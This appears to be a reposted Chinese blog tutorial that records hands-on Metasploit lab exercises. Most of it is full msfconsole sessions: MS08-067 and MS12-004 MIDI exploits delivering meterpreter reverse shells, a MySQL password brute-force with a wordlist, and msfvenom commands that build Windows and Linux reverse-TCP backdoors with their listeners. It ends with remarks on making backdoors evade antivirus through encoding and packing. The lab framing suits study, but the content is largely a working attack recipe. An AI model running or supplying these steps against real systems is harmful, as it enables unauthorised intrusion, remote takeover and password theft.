Metasploit 進階

來源:互聯網
上載者:User

標籤:.exe   required   got   步驟   passwords   range   串連   oca   方法   

  本文是"T00LS Metasploit(第二季)"的文檔版,是個人在觀看視頻動手操作的一個記錄,僅供學習。文中會介紹Metasploit的一些基本使用:主要包括遠程代碼執行、MIDI檔案解析遠程代碼執行、密碼破解、產生後門等。

一、遠程代碼執行MS08-067

  首先,我們準備了一台靶機:192.168.1.103  [Windows XP Professional]

msf > search ms08-067Matching Modules================   Name                                 Disclosure Date  Rank   Description   ----                                 ---------------  ----   -----------   exploit/windows/smb/ms08_067_netapi  2008-10-28       great  MS08-067 Microsoft Server Service Relative Path Stack Corruptionmsf > use exploit/windows/smb/ms08_067_netapimsf exploit(ms08_067_netapi) > show optionsModule options (exploit/windows/smb/ms08_067_netapi):   Name     Current Setting  Required  Description   ----     ---------------  --------  -----------   RHOST                     yes       The target address   RPORT    445              yes       The SMB service port (TCP)   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)Exploit target:   Id  Name   --  ----   0   Automatic Targetingmsf exploit(ms08_067_netapi) > set rhost 192.168.1.103rhost => 192.168.1.103msf exploit(ms08_067_netapi) > show targetsExploit targets:   Id  Name   --  ----   0   Automatic Targeting   1   Windows 2000 Universal...  
【有很多,就不一一展示了】
...
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcppayload => windows/meterpreter/reverse_tcpmsf exploit(ms08_067_netapi) > show optionsModule options (exploit/windows/smb/ms08_067_netapi):   Name     Current Setting  Required  Description   ----     ---------------  --------  -----------   RHOST    192.168.1.103    yes       The target address   RPORT    445              yes       The SMB service port (TCP)   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)Payload options (windows/meterpreter/reverse_tcp):   Name      Current Setting  Required  Description   ----      ---------------  --------  -----------   EXITFUNC  thread           yes       Exit technique (Accepted: ‘‘, seh, thread, process, none)   LHOST     192.168.1.110    yes       The listen address   LPORT     4444             yes       The listen portExploit target:   Id  Name   --  ----   0   Automatic Targeting

  注意需要設定一下LHOST和LPORT參數,預設是本機ip監聽4444連接埠,如果要攻擊外部ip的話,需要提供一個外部ip地址。下面是利用成功的:

MS17-010

  關於MS17-010的利用方法請移步: SMB MS17-010, 這裡就不做重複介紹了。

MIDI檔案解析遠程代碼執行

  靶機:192.168.1.111(XP) 攻擊機:192.168.1.110(Kali)

msf exploit(ms08_067_netapi) > search 12-004Matching Modules================   Name                                   Disclosure Date  Rank    Description   ----                                   ---------------  ----    -----------   exploit/windows/browser/ms12_004_midi  2012-01-10       normal  MS12-004 midiOutPlayNextPolyEvent Heap Overflowmsf exploit(ms08_067_netapi) > use exploit/windows/browser/ms12_004_midimsf exploit(ms12_004_midi) > show optionsModule options (exploit/windows/browser/ms12_004_midi):   Name       Current Setting  Required  Description   ----       ---------------  --------  -----------   OBFUSCATE  false            no        Enable JavaScript obfuscation   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0   SRVPORT    8080             yes       The local port to listen on.   SSL        false            no        Negotiate SSL for incoming connections   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)   URIPATH                     no        The URI to use for this exploit (default is random)Exploit target:   Id  Name   --  ----   0   Automatic

  需要設定兩個重要的參數:SRVHOST:設定為本機地址, SRVPORT:監聽連接埠(預設即可),另外就是URIPATH:"友好"訪問地址。

msf exploit(ms12_004_midi) > set SRVHOST 192.168.1.110    【設定為本機地址】SRVHOST => 192.168.1.110msf exploit(ms12_004_midi) > set URIPATH /URIPATH => /msf exploit(ms12_004_midi) > show optionsModule options (exploit/windows/browser/ms12_004_midi):   Name       Current Setting  Required  Description   ----       ---------------  --------  -----------   OBFUSCATE  false            no        Enable JavaScript obfuscation   SRVHOST    192.168.1.110    yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0   SRVPORT    8080             yes       The local port to listen on.   SSL        false            no        Negotiate SSL for incoming connections   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)   URIPATH    /                no        The URI to use for this exploit (default is random)Exploit target:   Id  Name   --  ----   0   Automaticmsf exploit(ms12_004_midi) > exploit[*] Exploit running as background job.[*] Started reverse TCP handler on 192.168.1.110:4444 msf exploit(ms12_004_midi) > [*] Using URL: http://192.168.1.110:8080/      【在靶機中用IE瀏覽器訪問該地址】[*] Server started.[*] 192.168.1.111    ms12_004_midi - Request as: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)[*] 192.168.1.111    ms12_004_midi - Sending html to 192.168.1.111:1222...[*] 192.168.1.111    ms12_004_midi - Request as: Windows-Media-Player/10.00.00.4058[*] 192.168.1.111    ms12_004_midi - Sending midi corruption file...[*] 192.168.1.111    ms12_004_midi - Request as: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)[*] 192.168.1.111    ms12_004_midi - Sending midi corruption file...[*] Sending stage (957487 bytes) to 192.168.1.111[*] Meterpreter session 3 opened (192.168.1.110:4444 -> 192.168.1.111:1225) at 2017-08-22 10:22:27 -0400[*] Session ID 3 (192.168.1.110:4444 -> 192.168.1.111:1225) processing InitialAutoRunScript ‘post/windows/manage/priv_migrate‘[*] Current session process is iexplore.exe (3300) as: CHINA-5D20EA9B7\Administrator[*] Session is Admin but not System.[*] Will attempt to migrate to specified System level process.[*] Trying services.exe (760)[+] Successfully migrated to services.exe (760) as: NT AUTHORITY\SYSTEM

  經過上述的攻擊過程,可以成功的拿到一個session。

msf exploit(ms12_004_midi) > sessions    【查看會話】Active sessions===============  Id  Type                     Information                                      Connection  --  ----                     -----------                                      ----------  3   meterpreter x86/windows  CHINA-5D20EA9B7\Administrator @ CHINA-5D20EA9B7  192.168.1.110:4444 -> 192.168.1.111:1225 (192.168.1.111)msf exploit(ms12_004_midi) > sessions -i 3    【-i 指定會話】[*] Starting interaction with 3...meterpreter > ipconfig                【可以成功的拿到一個meterpreter】

密碼破解 Mysql密碼破解

  由於實驗環境限制,先給出操作步驟,後面再給出運行樣本...

msf > search mysql_login      [mysql登陸認證]Matching Modules================   Name                                 Disclosure Date  Rank    Description   ----                                 ---------------  ----    -----------   auxiliary/scanner/mysql/mysql_login                   normal  MySQL Login Utilitymsf > use auxiliary/scanner/mysql/mysql_login msf auxiliary(mysql_login) > show optionsModule options (auxiliary/scanner/mysql/mysql_login):   Name              Current Setting  Required  Description   ----              ---------------  --------  -----------   BLANK_PASSWORDS   false            no        Try blank passwords for all users   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database   DB_ALL_PASS       false            no        Add all passwords in the current database to the list   DB_ALL_USERS      false            no        Add all users in the current database to the list   PASSWORD                           no        A specific password to authenticate with   PASS_FILE                          no        File containing passwords, one per line   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]   RHOSTS                             yes       The target address range or CIDR identifier   RPORT             3306             yes       The target port (TCP)   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host   THREADS           1                yes       The number of concurrent threads   USERNAME                           no        A specific username to authenticate as   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line   USER_AS_PASS      false            no        Try the username as the password for all users   USER_FILE                          no        File containing usernames, one per line   VERBOSE           true             yes       Whether to print output for all attemptsmsf auxiliary(mysql_login) > set rhosts 192.168.1.104rhosts => 192.168.1.104msf auxiliary(mysql_login) > set USERNAME rootUSERNAME => rootmsf auxiliary(mysql_login) > cat /root/pass.txt      [查看密碼字典內容][*] exec: cat /root/pass.txtaaabbbcccddd123456qwertyadminpasswdhahahelloworldmsf auxiliary(mysql_login) > set USERPASS_FILE /root/pass.txt    [設定密碼字典檔案]USERPASS_FILE => /root/pass.txtmsf auxiliary(mysql_login) > set threads 10               [設定運行線程數]threads => 10
msf auxiliary(mysql_login) > run
...

因為在暴力破解的時候出了些小問題,暫不給...

 

後門

  產生各種後門,請戳:msfvenom產生各類Payload命令

windows exe後門

  下面將介紹windows後門的使用,攻擊機:192.168.1.107(kali)      靶機:192.168.1.111(Win XP)

  首先要產生後門,以windows/meterpreter/reverse_tcp為例:

[email protected]:~# msfconsole                                                  IIIIII    dTb.dTb        _.---._  II     4‘  v  ‘B   .‘"".‘/|\`.""‘.  II     6.     .P  :  .‘ / | \ `.  :  II     ‘T;. .;P‘  ‘.‘  /  |  \  `.‘  II      ‘T; ;P‘    `. /   |   \ .‘IIIIII     ‘YvP‘       `-.__|__.-‘I love shells --egypt       =[ metasploit v4.14.27-dev                         ]+ -- --=[ 1659 exploits - 951 auxiliary - 293 post        ]+ -- --=[ 486 payloads - 40 encoders - 9 nops             ]+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]msf > msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows LHOST=192.168.1.107 LPORT=1234 -f exe > ./test.exe[*] exec: msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows LHOST=192.168.1.107 LPORT=1234 -f exe > ./test.exeNo encoder or badchars specified, outputting raw payloadPayload size: 333 bytesFinal size of exe file: 73802 bytes

  我們可以看到,上面後門地址是攻擊機的ip:192.168.1.107,連接埠為1234,產生後門之後,將其放到靶機192.168.1.111上,在攻擊機進行如下操作:

msf > use exploit/multi/handler msf exploit(handler) > show optionsModule options (exploit/multi/handler):   Name  Current Setting  Required  Description   ----  ---------------  --------  -----------Exploit target:   Id  Name   --  ----   0   Wildcard Targetmsf exploit(handler) > set payload windows/meterpreter/reverse_tcp        【其實是剛才那個後門payload】payload => windows/meterpreter/reverse_tcpmsf exploit(handler) > show optionsModule options (exploit/multi/handler):   Name  Current Setting  Required  Description   ----  ---------------  --------  -----------Payload options (windows/meterpreter/reverse_tcp):   Name      Current Setting  Required  Description   ----      ---------------  --------  -----------   EXITFUNC  process          yes       Exit technique (Accepted: ‘‘, seh, thread, process, none)   LHOST                      yes       The listen address   LPORT     4444             yes       The listen portExploit target:   Id  Name   --  ----   0   Wildcard Targetmsf exploit(handler) > set lhost 192.168.1.107      [設定反向串連的ip]lhost => 192.168.1.107    msf exploit(handler) > set lport 1234            [設定反向串連的連接埠]lport => 1234msf exploit(handler) > run                   [run之後在靶機win xp上運行後門test.exe][*] Started reverse TCP handler on 192.168.1.107:1234 [*] Starting the payload handler...[*] Sending stage (957487 bytes) to 192.168.1.111[*] Meterpreter session 1 opened (192.168.1.107:1234 -> 192.168.1.111:1470) at 2017-08-23 03:41:20 -0400meterpreter > ipconfig

  這樣我們就能拿到一個meterpreter了,然後就可以自己發揮了。運行如下:

想更多瞭解msfvenom 產生windows後門,請戳下面兩個連結:
【譯】msfvenom

【原創】通過MSFVenom產生exe後門木馬拿shell

Linux後門

  下面將簡單示範一下linux後門的使用。攻擊機:192.168.1.107(kali)      靶機:192.168.1.103(ubuntu16.04)

  先產生linux後門: linux/x86/meterpreter/reverse_tcp, 在kali上操作如下:

msf > msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.107 LPORT=4321 -f elf > shell.elf[*] exec: msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.107 LPORT=4321 -f elf > shell.elfNo platform was selected, choosing Msf::Module::Platform::Linux from the payloadNo Arch selected, selecting Arch: x86 from the payloadNo encoder or badchars specified, outputting raw payloadPayload size: 99 bytesFinal size of elf file: 183 bytesmsf > chmod 777 shell.elf        [賦予執行許可權][*] exec: chmod 777 shell.elf

  將產生的後門拷貝的靶機:192.168.1.103上, 在攻擊機:192.168.1.107進行如下操作:

msf > use exploit/multi/handler msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcppayload => linux/x86/meterpreter/reverse_tcpmsf exploit(handler) > show optionsModule options (exploit/multi/handler):   Name  Current Setting  Required  Description   ----  ---------------  --------  -----------Payload options (linux/x86/meterpreter/reverse_tcp):   Name   Current Setting  Required  Description   ----   ---------------  --------  -----------   LHOST                   yes       The listen address   LPORT  4444             yes       The listen portExploit target:   Id  Name   --  ----   0   Wildcard Targetmsf exploit(handler) > set LHOST 192.168.1.107      [設定本機ip]LHOST => 192.168.1.107msf exploit(handler) > set LPORT 4321            [設定監聽連接埠]LPORT => 4321msf exploit(handler) > run                   [run之後,在靶機上運行後門程式shell.elf][*] Started reverse TCP handler on 192.168.1.107:4321 [*] Starting the payload handler...[*] Sending stage (797784 bytes) to 192.168.1.103[*] Meterpreter session 1 opened (192.168.1.107:4321 -> 192.168.1.103:39498) at 2017-08-23 04:33:08 -0400meterpreter > ifconfig                     [可以拿到一個meterpreter]

  剩下的就自己發揮了,下面是運行時:

  其他後門就先不介紹了,參考前面給出的:msfvenom產生各類Payload命令, 及結合前面兩個樣本,應該問題不大,有時間再補充吧。

  後門這部分,其實不僅僅是產生一個簡單的後門,其更應該具有免殺特性,msfvenom 在產生後門的同時可以進行編碼,而且還可以使用工具進行加殼,提高隱蔽性。

 

 

 

  

 

 

未完,待續...

 

Metasploit 進階

相關文章

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

Tags Index: